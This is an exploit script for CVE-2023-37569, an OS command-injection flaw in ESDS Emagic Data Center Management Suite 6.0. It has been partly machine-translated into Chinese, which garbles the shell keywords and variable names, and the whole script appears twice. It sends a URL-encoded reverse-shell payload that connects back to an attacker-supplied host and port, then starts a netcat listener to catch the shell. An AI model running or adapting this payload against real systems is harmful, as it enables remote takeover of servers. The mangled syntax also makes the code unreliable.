#!/bin/bash
#利用标题: Emagic Data Center Management Suite Suite v6.0 -OS命令注射
#日期: 03-08-2023
#利用作者: Shubham Pandey the Whateh4t
#供应商homepage3360 https://www.esds.co.in/enlight360
#版本: 6.0.0
#在: Kali Linux上测试
#CVE : CVE-2023-37569
URL=$ 1
lhost=$ 2
lport=$ 3
回声'****************************************************************************
echo' * esds emagic 6.0.0 rce *'
Echo' * CVE-2023-37569 *'
echo' * shubham the wheiteh4t *'
回声'****************************************************************************
如果[$#-LT 3];然后
回声'''
用法:
./exploit.sh http://ip lhost lport
./exploit.sh http://192.168.0.10 192.168.0.20 1337
'''
出口1
fi
url='$ 1/index.php/monitor/operations/utilities/'
回声'[+] URL : $ url'
Echo'[+] LHOST : $ LHOST'
Echo'[+] LPORT : $ LPORT'
回声
有效载荷='bash%20%2DC%20%27bash%20%2DI%20%3E%26%20%2FDEV%2FTCP%2F $ lhost%2F $ LPORT%200%3E%261%27'
POST_DATA='UTILITY=PINGOPERATIONS=YeshostName=%3B%20 $ payloadParam_before=param_after=proge_id=1rndval=1682490204846'
回声'[!]触发漏洞.'
回声$ URL
(睡眠3; curl -s -x post -d $ post_data $ url /dev /null)
回声'[+]捕捉壳.'
NC -LVP 4444
#利用标题: Emagic Data Center Management Suite Suite v6.0 -OS命令注射
#日期: 03-08-2023
#利用作者: Shubham Pandey the Whateh4t
#供应商homepage3360 https://www.esds.co.in/enlight360
#版本: 6.0.0
#在: Kali Linux上测试
#CVE : CVE-2023-37569
URL=$ 1
lhost=$ 2
lport=$ 3
回声'****************************************************************************
echo' * esds emagic 6.0.0 rce *'
Echo' * CVE-2023-37569 *'
echo' * shubham the wheiteh4t *'
回声'****************************************************************************
如果[$#-LT 3];然后
回声'''
用法:
./exploit.sh http://ip lhost lport
./exploit.sh http://192.168.0.10 192.168.0.20 1337
'''
出口1
fi
url='$ 1/index.php/monitor/operations/utilities/'
回声'[+] URL : $ url'
Echo'[+] LHOST : $ LHOST'
Echo'[+] LPORT : $ LPORT'
回声
有效载荷='bash%20%2DC%20%27bash%20%2DI%20%3E%26%20%2FDEV%2FTCP%2F $ lhost%2F $ LPORT%200%3E%261%27'
POST_DATA='UTILITY=PINGOPERATIONS=YeshostName=%3B%20 $ payloadParam_before=param_after=proge_id=1rndval=1682490204846'
回声'[!]触发漏洞.'
回声$ URL
(睡眠3; curl -s -x post -d $ post_data $ url /dev /null)
回声'[+]捕捉壳.'
NC -LVP 4444